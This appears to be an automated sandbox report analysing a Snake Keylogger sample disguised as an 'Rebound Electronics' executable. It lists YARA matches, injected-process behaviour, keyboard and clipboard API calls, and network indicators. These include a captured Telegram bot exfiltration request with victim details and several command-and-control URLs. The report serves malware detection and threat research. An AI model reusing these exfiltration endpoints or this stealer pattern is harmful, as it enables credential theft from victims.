Source: Joe Sandbox View	IP Address: 132.226.247.73 132.226.247.73

Source: Joe Sandbox View

ASN Name: HOMEPL-ASPL HOMEPL-ASPL

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49730 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49733 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49734 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49732 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49738 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49740 -> 188.114.97.3:443

Source: global traffic

TCP traffic: 192.168.2.4:49754 -> 188.128.134.93:587

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49731 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe

Code function: 0_2_00C74EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_00C74EB5

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:899552%0D%0ADate%20and%20Time:%2020/11/2024%20/%2021:02:20%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20899552%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: panta.home.pl

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 20 Nov 2024 09:12:19 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: RegSvcs.exe, 00000001.00000002.4130425845.00000000030B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: 114117914 - Rebound Electronics.exe, 00000000.00000002.1693880834.0000000003DE0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4129575492.0000000000402000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: 114117914 - Rebound Electronics.exe, 00000000.00000002.1693880834.0000000003DE0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4129575492.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4130425845.0000000002F31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: 114117914 - Rebound Electronics.exe, 00000000.00000002.1693880834.0000000003DE0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4129575492.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4130425845.0000000002F31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: RegSvcs.exe, 00000001.00000002.4130425845.0000000002F31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: RegSvcs.exe, 00000001.00000002.4130425845.0000000002F31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: 114117914 - Rebound Electronics.exe, 00000000.00000002.1693880834.0000000003DE0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4129575492.0000000000402000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: RegSvcs.exe, 00000001.00000002.4130425845.00000000030B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://panta.home.pl
Source: RegSvcs.exe, 00000001.00000002.4130425845.0000000002F31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 114117914 - Rebound Electronics.exe, 00000000.00000002.1693880834.0000000003DE0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4129575492.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4130425845.0000000002F31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: RegSvcs.exe, 00000001.00000002.4130425845.0000000003018000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: 114117914 - Rebound Electronics.exe, 00000000.00000002.1693880834.0000000003DE0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4130425845.0000000003018000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4129575492.0000000000402000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: RegSvcs.exe, 00000001.00000002.4130425845.0000000003018000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: RegSvcs.exe, 00000001.00000002.4130425845.0000000003018000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:899552%0D%0ADate%20a
Source: RegSvcs.exe, 00000001.00000002.4130425845.00000000030F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: RegSvcs.exe, 00000001.00000002.4130425845.00000000030F0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: RegSvcs.exe, 00000001.00000002.4130425845.0000000002FF2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4130425845.0000000002F82000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4130425845.0000000003018000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: 114117914 - Rebound Electronics.exe, 00000000.00000002.1693880834.0000000003DE0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4130425845.0000000002F82000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4129575492.0000000000402000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: RegSvcs.exe, 00000001.00000002.4130425845.0000000003018000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.75
Source: RegSvcs.exe, 00000001.00000002.4130425845.0000000002FF2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4130425845.0000000002FAC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4130425845.0000000003018000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.75$
Source: RegSvcs.exe, 00000001.00000002.4132101583.00000000041B6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4132101583.0000000004204000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4132101583.0000000004012000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4130425845.000000000303D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4132101583.0000000004087000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4132101583.0000000004060000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4132101583.00000000042DA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: RegSvcs.exe, 00000001.00000002.4132101583.0000000004018000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4132101583.0000000004191000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4132101583.00000000042B5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4132101583.00000000041BE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4132101583.0000000004062000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4132101583.0000000003FED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: RegSvcs.exe, 00000001.00000002.4132101583.00000000041B6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4132101583.0000000004204000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4132101583.0000000004012000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4130425845.000000000303D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4132101583.0000000004087000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4132101583.0000000004060000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4132101583.00000000042DA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: RegSvcs.exe, 00000001.00000002.4132101583.0000000004018000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4132101583.0000000004191000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4132101583.00000000042B5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4132101583.00000000041BE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4132101583.0000000004062000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4132101583.0000000003FED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: RegSvcs.exe, 00000001.00000002.4130425845.0000000003126000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4130425845.000000000303D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: RegSvcs.exe, 00000001.00000002.4130425845.0000000003121000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49752 version: TLS 1.2

Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe

Code function: 0_2_00C76B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_00C76B0C

Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe

Code function: 0_2_00C76D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00C76D07

Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe

0_2_00C76B0C

Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe

Code function: 0_2_00C62B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_00C62B37

Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe

Code function: 0_2_00C8F7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_00C8F7FF

System Summary

Malicious sample detected (through community Yara rule)

Source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.114117914 - Rebound Electronics.exe.3de0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.114117914 - Rebound Electronics.exe.3de0000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.114117914 - Rebound Electronics.exe.3de0000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.114117914 - Rebound Electronics.exe.3de0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.114117914 - Rebound Electronics.exe.3de0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.114117914 - Rebound Electronics.exe.3de0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000001.00000002.4129575492.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1693880834.0000000003DE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1693880834.0000000003DE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000000.00000002.1693880834.0000000003DE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: Process Memory Space: 114117914 - Rebound Electronics.exe PID: 7496, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 7520, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Code function: This is a third-party compiled AutoIt script.	0_2_00C23D19
Source: 114117914 - Rebound Electronics.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: 114117914 - Rebound Electronics.exe, 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_a9497be8-b
Source: 114117914 - Rebound Electronics.exe, 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_b26b7dd2-2
Source: 114117914 - Rebound Electronics.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_8e68ebbc-7
Source: 114117914 - Rebound Electronics.exe	String found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_3338c76f-5

Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe

Code function: 0_2_00C66685: CreateFileW,DeviceIoControl,CloseHandle,

0_2_00C66685

Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe

Code function: 0_2_00C5ACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00C5ACC5

Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe

Code function: 0_2_00C679D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_00C679D3

Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Code function: 0_2_00C4B043	0_2_00C4B043
Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Code function: 0_2_00C33200	0_2_00C33200
Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Code function: 0_2_00C33B70	0_2_00C33B70
Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Code function: 0_2_00C5410F	0_2_00C5410F
Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Code function: 0_2_00C402A4	0_2_00C402A4
Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Code function: 0_2_00C5038E	0_2_00C5038E
Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Code function: 0_2_00C2E3B0	0_2_00C2E3B0
Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Code function: 0_2_00C406D9	0_2_00C406D9
Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Code function: 0_2_00C5467F	0_2_00C5467F
Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Code function: 0_2_00C8AACE	0_2_00C8AACE
Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Code function: 0_2_00C54BEF	0_2_00C54BEF
Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Code function: 0_2_00C4CCC1	0_2_00C4CCC1
Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Code function: 0_2_00C2AF50	0_2_00C2AF50
Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Code function: 0_2_00C26F07	0_2_00C26F07
Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Code function: 0_2_00C831BC	0_2_00C831BC
Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Code function: 0_2_00C4D1B9	0_2_00C4D1B9
Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Code function: 0_2_00C3B11F	0_2_00C3B11F
Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Code function: 0_2_00C5724D	0_2_00C5724D
Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Code function: 0_2_00C4123A	0_2_00C4123A
Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Code function: 0_2_00C613CA	0_2_00C613CA
Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Code function: 0_2_00C293F0	0_2_00C293F0
Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Code function: 0_2_00C3F563	0_2_00C3F563
Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Code function: 0_2_00C296C0	0_2_00C296C0
Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Code function: 0_2_00C6B6CC	0_2_00C6B6CC
Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Code function: 0_2_00C8F7FF	0_2_00C8F7FF
Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Code function: 0_2_00C277B0	0_2_00C277B0
Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Code function: 0_2_00C579C9	0_2_00C579C9
Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Code function: 0_2_00C3FA57	0_2_00C3FA57
Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Code function: 0_2_00C29B60	0_2_00C29B60
Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Code function: 0_2_00C27D19	0_2_00C27D19
Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Code function: 0_2_00C49ED0	0_2_00C49ED0
Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Code function: 0_2_00C3FE6F	0_2_00C3FE6F
